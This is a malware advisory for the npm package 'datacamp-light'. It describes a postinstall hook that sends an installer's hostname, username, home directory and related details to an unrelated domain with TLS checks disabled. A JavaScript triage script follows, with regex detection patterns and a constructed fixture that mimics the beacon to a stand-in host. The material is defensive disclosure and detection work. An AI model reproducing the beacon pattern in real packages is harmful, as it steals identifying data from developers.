MAL-2026-6091
Malicious code in datacamp-light (npm)
Details
## Source: amazon-inspector (4dbdcc4ef12aca6461f8e765976a7b2b33099a1791a7aee7e353371b7954a91c)

Package impersonates the DataCamp brand while shipping near-empty stub exports (index.js `init`/`helper` return trivial constants). The postinstall lifecycle hook (`node install.js`) runs on every `npm install` and collects the installer's hostname, OS username, home directory, platform, current working directory, and timestamp, then POSTs them over HTTPS to `dc.iam.c.noratomo.asia/install` with TLS certificate verification disabled (`rejectUnauthorized: false`). The destination domain has no relationship to datacamp.com. The combination of brand-impersonating name, hollow library functionality, lifecycle-triggered outbound beacon to an unrelated domain, identifying-host fields, and disabled TLS verification is a supply-chain reconnaissance implant against developers who install this expecting DataCamp tooling.
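A static triage check for the pattern described above, as an added example that is not part of the advisory or of any scanner's own code: it finds scripts launched by install-time lifecycle hooks and flags the three markers named in the report (host fingerprinting, an outbound HTTPS request, disabled TLS verification). The function names, the sample manifest, and the host `collector.example.invalid` are constructed for illustration.

```javascript
// Added example (not the advisory's code). Sample package data is constructed.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];

// Indicators mirror the behaviour the advisory describes for install.js.
const INDICATORS = [
  { id: 'host-fingerprint', min: 2, re: /\bos\.(?:hostname|userInfo|homedir|platform)\s*\(/g },
  { id: 'outbound-request', min: 1, re: /require\(\s*['"](?:node:)?https?['"]\s*\)|\bfetch\s*\(/g },
  { id: 'tls-verification-disabled', min: 1, re: /rejectUnauthorized\s*:\s*false/g },
];

// Scripts started as `node <file>` from an install-time lifecycle hook.
function hookTargets(manifest) {
  const scripts = manifest.scripts || {};
  const targets = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook] || '';
    for (const m of cmd.matchAll(/\bnode\s+(?:\.\/)?([\w./-]+?\.[cm]?js)\b/g)) {
      targets.push({ hook, file: m[1] });
    }
  }
  return targets;
}

// manifest: parsed package.json; files: { relativePath: sourceText }.
function auditPackage(manifest, files) {
  const findings = [];
  for (const { hook, file } of hookTargets(manifest)) {
    const src = files[file] || '';
    const hits = INDICATORS
      .filter((i) => (src.match(i.re) || []).length >= i.min)
      .map((i) => i.id);
    if (hits.length > 0) {
      findings.push({ hook, file, indicators: hits,
        beaconPattern: hits.length === INDICATORS.length });
    }
  }
  return findings;
}

// Constructed fixture: a non-functional fragment carrying the same markers.
const SAMPLE_MANIFEST = { name: 'example-pkg', scripts: { postinstall: 'node install.js' } };
const SAMPLE_FILES = { 'install.js': [
  "const os = require('os'); const https = require('https');",
  'const info = { h: os.hostname(), u: os.userInfo().username, d: os.homedir() };',
  "https.request({ host: 'collector.example.invalid', path: '/install',",
  "  method: 'POST', rejectUnauthorized: false });",
].join('\n') };
console.log(JSON.stringify(auditPackage(SAMPLE_MANIFEST, SAMPLE_FILES), null, 2));
```

Read the manifest and hook scripts from a tarball unpacked without running hooks (for example after `npm install --ignore-scripts`), and treat a hit as a reason for manual review, since these regular expressions are heuristics.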
Affected packages
No fixed version published yet for datacamp-light (npm). Pin to a known-safe version or switch to an alternative.